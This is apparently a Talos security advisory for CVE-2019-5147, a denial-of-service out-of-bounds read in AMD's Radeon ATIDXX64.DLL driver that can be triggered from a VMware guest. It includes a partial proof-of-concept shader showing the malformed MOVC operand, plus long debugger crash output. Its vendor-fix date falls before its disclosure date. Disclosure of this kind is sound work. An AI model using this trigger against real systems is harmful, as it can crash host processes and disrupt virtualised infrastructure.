Talos Vulnerability Report

TALOS-2019-0936

AMD ATI Radeon ATIDXX64.DLL MOVC shader functionality denial-of-service vulnerability

January 21, 2020
CVE Number

CVE-2019-5147

Summary

An exploitable out-of-bounds read vulnerability exists in AMD ATIDXX64.DLL driver, version 26.20.13003.1007. A specially crafted pixel shader can cause a denial of service. An attacker can provide a specially crafted shader file to trigger this vulnerability. This vulnerability can be triggered from VMware guest, affecting VMware host.

Tested Versions

AMD ATIDXX64.DLL (26.20.13003.1007) running on Radeon RX 550 / 550 Series VMware Workstation 15 (15.5.0 build-14665864) with Windows 10 x64 as guestVM

Product URLs

http://amd.com http://vmware.com

CVSSv3 Score

8.6 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

CWE

CWE-125: Out-of-bounds Read

Details

This vulnerability can be triggered by supplying a malformed pixel shader (inside VMware guest OS). Such attack can be triggered from from VMware guest usermode to cause an out-of-bounds read in the vmware-vmx.exe process on host, or theoretically through WEBGL (remote website).

Example shader:

ps_4_1
00000000: dcl_global_flags refactoringAllowed
00000001: dcl_constant_buffer cb0[3].xyzw, immediateIndexed
00000002: dcl_sampler sampler[0]
00000003: dcl_sampler sampler[1]
00000004: dcl_sampler sampler[2]
...
00000020: movc r1.x, sampler[1], r1.z, r1.x

By modifying the MOVC instruction (Component-wise conditional move) operand from "movc r1.x, r1.y, r1.z, r1.x" to "movc r1.x, sampler[1], r1.z, r1.x", it is possible to cause an out-of-bounds read access violation.

As you can see below, after the shader operand modification, the RCX register used as INDEX in the "MOV RDX,QWORD PTR [RAX+RCX*8]" is set to 0xffffffff.

(6b4.1720): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
atidxx64!AmdDxGsaFreeCompiledShader+0x3aeabc:
00007ff8`e3088d8c 488b14c8        mov     rdx,qword ptr [rax+rcx*8] ds:00000152`ce649a10=????????????????
0:000> r
rax=0000014ace649a18 rbx=00007ff8e2c70000 rcx=00000000ffffffff
rdx=0000014ace6499f8 rsi=0000000000000010 rdi=0000014ace647fd8
rip=00007ff8e3088d8c rsp=00000036545796e0 rbp=0000000000000010
 r8=0000000000000004  r9=00007ff8e35d1594 r10=0000000000000001
r11=0000014ace8e3398 r12=0000014ace647f00 r13=0000000000000000
r14=0000000000000000 r15=0000014ace6490e0
iopl=0         nv up ei ng nz ac po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010296
atidxx64!AmdDxGsaFreeCompiledShader+0x3aeabc:
00007ff8`e3088d8c 488b14c8        mov     rdx,qword ptr [rax+rcx*8] ds:00000152`ce649a10=????????????????

Crash Information

0:000> !analyze -v
*******************************************************************************
*                                                                             *
*                        Exception Analysis                                   *
*                                                                             *
*******************************************************************************

*** WARNING: Unable to verify checksum for VENDOR_ONLY.exe

KEY_VALUES_STRING: 1

    Key  : AV.Fault
    Value: Read

    Key  : Timeline.OS.Boot.DeltaSec
    Value: 233600

    Key  : Timeline.Process.Start.DeltaSec
    Value: 68


PROCESSES_ANALYSIS: 1

SERVICE_ANALYSIS: 1

STACKHASH_ANALYSIS: 1

TIMELINE_ANALYSIS: 1

Timeline: !analyze.Start
    Name: <blank>
    Time: 2019-10-11T12:02:20.144Z
    Diff: 7855 mSec

Timeline: Dump.Current
    Name: <blank>
    Time: 2019-10-11T12:02:28.0Z
    Diff: 0 mSec

Timeline: Process.Start
    Name: <blank>
    Time: 2019-10-11T12:01:20.0Z
    Diff: 68000 mSec

Timeline: OS.Boot
    Name: <blank>
    Time: 2019-10-08T19:09:08.0Z
    Diff: 233600000 mSec


DUMP_CLASS: 2

DUMP_QUALIFIER: 0

FAULTING_IP: 
atidxx64!AmdDxGsaFreeCompiledShader+3aeabc
00007ff8`e3088d8c 488b14c8        mov     rdx,qword ptr [rax+rcx*8]

EXCEPTION_RECORD:  (.exr -1)
ExceptionAddress: 00007ff8e3088d8c (atidxx64!AmdDxGsaFreeCompiledShader+0x00000000003aeabc)
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 0000000000000000
   Parameter[1]: 00000152ce649a10
Attempt to read from address 00000152ce649a10

FAULTING_THREAD:  00001720

DEFAULT_BUCKET_ID:  INVALID_POINTER_READ

PROCESS_NAME:  VENDOR_ONLY.exe

FOLLOWUP_IP: 
atidxx64!AmdDxGsaFreeCompiledShader+3aeabc
00007ff8`e3088d8c 488b14c8        mov     rdx,qword ptr [rax+rcx*8]

READ_ADDRESS:  00000152ce649a10 

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE_STR:  c0000005

EXCEPTION_PARAMETER1:  0000000000000000

EXCEPTION_PARAMETER2:  00000152ce649a10

WATSON_BKT_PROCSTAMP:  5cb740ee

WATSON_BKT_MODULE:  atidxx64.dll

WATSON_BKT_MODSTAMP:  5d781adb

WATSON_BKT_MODOFFSET:  418d8c

WATSON_BKT_MODVER:  26.20.13003.1007

MODULE_VER_PRODUCT:  Advanced Micro Devices, Inc. Radeon DirectX 11 Driver

BUILD_VERSION_STRING:  18362.1.amd64fre.19h1_release.190318-1202

MODLIST_WITH_TSCHKSUM_HASH:  2467318f4e32d63f6c5405aabc2a43724e772411

MODLIST_SHA1_HASH:  8d415343d816bb4896ee4592431a2c0c44961ee3

NTGLOBALFLAG:  470

PROCESS_BAM_CURRENT_THROTTLED: 0

PROCESS_BAM_PREVIOUS_THROTTLED: 0

APPLICATION_VERIFIER_FLAGS:  0

PRODUCT_TYPE:  1

SUITE_MASK:  272

DUMP_TYPE:  fe

ANALYSIS_SESSION_HOST:  CLAB

ANALYSIS_SESSION_TIME:  10-11-2019 14:02:20.0144

ANALYSIS_VERSION: 10.0.18362.1 amd64fre

THREAD_ATTRIBUTES: 
OS_LOCALE:  ENU

BUGCHECK_STR:  APPLICATION_FAULT_INVALID_POINTER_READ

PRIMARY_PROBLEM_CLASS:  APPLICATION_FAULT

PROBLEM_CLASSES: 

    ID:     [0n313]
    Type:   [@ACCESS_VIOLATION]
    Class:  Addendum
    Scope:  BUCKET_ID
    Name:   Omit
    Data:   Omit
    PID:    [Unspecified]
    TID:    [0x1720]
    Frame:  [0] : atidxx64!AmdDxGsaFreeCompiledShader

    ID:     [0n285]
    Type:   [INVALID_POINTER_READ]
    Class:  Primary
    Scope:  DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
            BUCKET_ID
    Name:   Add
    Data:   Omit
    PID:    [Unspecified]
    TID:    [0x1720]
    Frame:  [0] : atidxx64!AmdDxGsaFreeCompiledShader

LAST_CONTROL_TRANSFER:  from 00007ff8e304d1f4 to 00007ff8e3088d8c

STACK_TEXT:  
00000036`545796e0 00007ff8`e304d1f4 : 00000000`00000000 00000000`00000000 00000036`00000000 00007ff8`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x3aeabc
00000036`545797c0 00007ff8`e2de6416 : 0000014a`ce647fd8 0000014a`ce837000 0000014a`ce65be00 0000014a`ce837001 : atidxx64!AmdDxGsaFreeCompiledShader+0x372f24
00000036`54579a30 00007ff8`e2dd66d0 : 0000014a`ce621b10 0000014a`ce640098 00000000`00000004 0000014a`ce621b10 : atidxx64!AmdDxGsaFreeCompiledShader+0x10c146
00000036`54579bf0 00007ff8`e2db5924 : 0000014a`ce621b10 0000014a`ce838640 00000036`5457a430 0000014a`ce621b10 : atidxx64!AmdDxGsaFreeCompiledShader+0xfc400
00000036`54579c70 00007ff8`e2cf9364 : 00000000`00000001 00000036`5457a430 0000014a`ce838640 00000036`5457a430 : atidxx64!AmdDxGsaFreeCompiledShader+0xdb654
00000036`5457a1f0 00007ff8`e347fa28 : 0000014a`c82f8188 00000036`5457a320 00000036`5457a430 0000014a`c9d4eac0 : atidxx64!AmdDxGsaFreeCompiledShader+0x1f094
00000036`5457a220 00007ff8`e346515b : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x7a5758
00000036`5457a390 00007ff8`e3464c92 : 00000000`00000000 0000014a`ce838340 0000014a`ce592890 00000036`5457e0a0 : atidxx64!AmdDxGsaFreeCompiledShader+0x78ae8b
00000036`5457a3f0 00007ff8`e34956b3 : 0000014a`ce838340 00000000`00000000 0000014a`ce5f8730 00000036`5457e0a0 : atidxx64!AmdDxGsaFreeCompiledShader+0x78a9c2
00000036`5457e050 00007ff8`e3464b67 : 00000000`00000004 0000014a`ce8362c0 0000014a`ce5e5a90 0000014a`ce5a06c0 : atidxx64!AmdDxGsaFreeCompiledShader+0x7bb3e3
00000036`5457e080 00007ff8`e3534701 : 00000000`00000000 00000036`5457e3f0 00000000`00000000 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x78a897
00000036`5457e0e0 00007ff8`e2cf4cca : 00000000`00000000 00000000`00000000 00000036`5457e3f0 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x85a431
00000036`5457e120 00007ff8`e2cf4b13 : 0000014a`ce5bacd0 00000000`00000003 00000000`00000003 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x1a9fa
00000036`5457e160 00007ff8`e2c7c05e : 00000000`00000001 00000000`00000000 00000000`000007a8 00000000`00000003 : atidxx64!AmdDxGsaFreeCompiledShader+0x1a843
00000036`5457e1f0 00007ff8`e33e8146 : 00000000`00000000 00000036`5457e3f0 00000000`00000000 ffffffff`ffffffff : atidxx64!XdxQueryTlsLookupTable+0x6d6e
00000036`5457e230 00007ff8`e344bd09 : 00000000`00000000 0000014a`c8289d34 00000036`5457e3f0 00000000`00001400 : atidxx64!AmdDxGsaFreeCompiledShader+0x70de76
00000036`5457e3a0 00007ff8`e2c8d8b1 : 0000014a`ca159988 0000014a`c831b510 ffffffff`fffffffe 00007ff8`fee15113 : atidxx64!AmdDxGsaFreeCompiledShader+0x771a39
00000036`5457e3d0 00007ff8`fee18edc : 00000000`00000000 00000036`5457e600 0000014a`ca159978 00007ff9`04bfbabb : atidxx64!XdxQueryTlsLookupTable+0x185c1
00000036`5457e500 00007ff8`fee2295f : 00000036`00000001 0000014a`c8317928 0000014a`ca159978 0000014a`c830da10 : d3d11!CPixelShader::CLS::FinalConstruct+0x23c
00000036`5457e760 00007ff8`fee2289a : 00000036`5457ee40 00007ff8`fefd2388 0000014a`ca159840 00000000`000007a8 : d3d11!CLayeredObjectWithCLS<CPixelShader>::FinalConstruct+0xa3
00000036`5457e7f0 00007ff8`fee0ee58 : 0000014a`ca159868 00000036`5457ee40 00000036`5457ee70 00007ff8`fefd2388 : d3d11!CLayeredObjectWithCLS<CPixelShader>::CreateInstance+0x152
00000036`5457e850 00007ff8`fee1b17d : ffffffff`fffffffe 0000014a`ca159840 00000000`00000014 00000000`00000001 : d3d11!CDevice::CreateLayeredChild+0xc88
00000036`5457ec90 00007ff8`fee1b950 : 0000014a`ca159840 00000000`00000009 00000000`00000188 00000000`00000030 : d3d11!NDXGI::CDevice::CreateLayeredChild+0x6d
00000036`5457ee00 00007ff8`fee014f4 : 0000014a`c82eff20 00000000`00000009 0000014a`c8289ab0 0000014a`c82f0758 : d3d11!NOutermost::CDevice::CreateLayeredChild+0x1b0
00000036`5457eff0 00007ff8`fee01463 : 0000014a`c8289ab0 00480063`0000c000 00000036`5457f350 00450056`005f0031 : d3d11!CDevice::CreateAndRecreateLayeredChild<SD3D11LayeredPixelShaderCreationArgs>+0x64
00000036`5457f050 00007ff8`fee011e8 : 0000014a`c82f0758 0000014a`c8289ab0 00000000`00000874 00000000`00000000 : d3d11!CDevice::CreatePixelShader_Worker+0x203
00000036`5457f200 00007ff7`6b3d2f16 : 0000014a`c830daf0 00000036`5457f2c8 0000014a`c82f0768 00000000`00000000 : d3d11!CDevice::CreatePixelShader+0x28
...

STACK_COMMAND:  ~0s ; .cxr ; kb

THREAD_SHA1_HASH_MOD_FUNC:  b83b420a1889acfa7499f03138efd1bbb8d42aaa

THREAD_SHA1_HASH_MOD_FUNC_OFFSET:  207ff31388f1e8a88dd8a5d3adca8cc37b630abf

THREAD_SHA1_HASH_MOD:  9140cc03c00bea0093c654d38b4e903d793400cd

FAULT_INSTR_CODE:  c8148b48

SYMBOL_STACK_INDEX:  0

SYMBOL_NAME:  atidxx64!AmdDxGsaFreeCompiledShader+3aeabc

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: atidxx64

IMAGE_NAME:  atidxx64.dll

DEBUG_FLR_IMAGE_TIMESTAMP:  5d781adb

FAILURE_BUCKET_ID:  INVALID_POINTER_READ_c0000005_atidxx64.dll!AmdDxGsaFreeCompiledShader

BUCKET_ID:  APPLICATION_FAULT_INVALID_POINTER_READ_atidxx64!AmdDxGsaFreeCompiledShader+3aeabc

FAILURE_EXCEPTION_CODE:  c0000005

FAILURE_IMAGE_NAME:  atidxx64.dll

BUCKET_ID_IMAGE_STR:  atidxx64.dll

FAILURE_MODULE_NAME:  atidxx64

BUCKET_ID_MODULE_STR:  atidxx64

FAILURE_FUNCTION_NAME:  AmdDxGsaFreeCompiledShader

BUCKET_ID_FUNCTION_STR:  AmdDxGsaFreeCompiledShader

BUCKET_ID_OFFSET:  3aeabc

BUCKET_ID_MODTIMEDATESTAMP:  5d781adb

BUCKET_ID_MODCHECKSUM:  1ae4e65

BUCKET_ID_MODVER_STR:  0.0.0.0

BUCKET_ID_PREFIX_STR:  APPLICATION_FAULT_INVALID_POINTER_READ_

FAILURE_PROBLEM_CLASS:  APPLICATION_FAULT

FAILURE_SYMBOL_NAME:  atidxx64.dll!AmdDxGsaFreeCompiledShader

TARGET_TIME:  2019-10-11T12:02:43.000Z

OSBUILD:  18362

OSSERVICEPACK:  329

SERVICEPACK_NUMBER: 0

OS_REVISION: 0

OSPLATFORM_TYPE:  x64

OSNAME:  Windows 10

OSEDITION:  Windows 10 WinNt SingleUserTS

USER_LCID:  0

OSBUILD_TIMESTAMP:  unknown_date

BUILDDATESTAMP_STR:  190318-1202

BUILDLAB_STR:  19h1_release

BUILDOSVER_STR:  10.0.18362.1.amd64fre.19h1_release.190318-1202

ANALYSIS_SESSION_ELAPSED_TIME:  5b08

ANALYSIS_SOURCE:  UM

FAILURE_ID_HASH_STRING:  um:invalid_pointer_read_c0000005_atidxx64.dll!amddxgsafreecompiledshader

FAILURE_ID_HASH:  {08b458dc-1323-2abb-9f1a-d0ac543a793c}

Followup:     MachineOwner
---------

Timeline

2019-10-23 - Vendor Disclosure 2019-01-13 - Vendor confirmed fix and no issues found on versions 15.5.1 with 20.1.1 AMD drivers
2020-01-21 - Public Release

Credit

Discovered by Piotr Bania of Cisco Talos.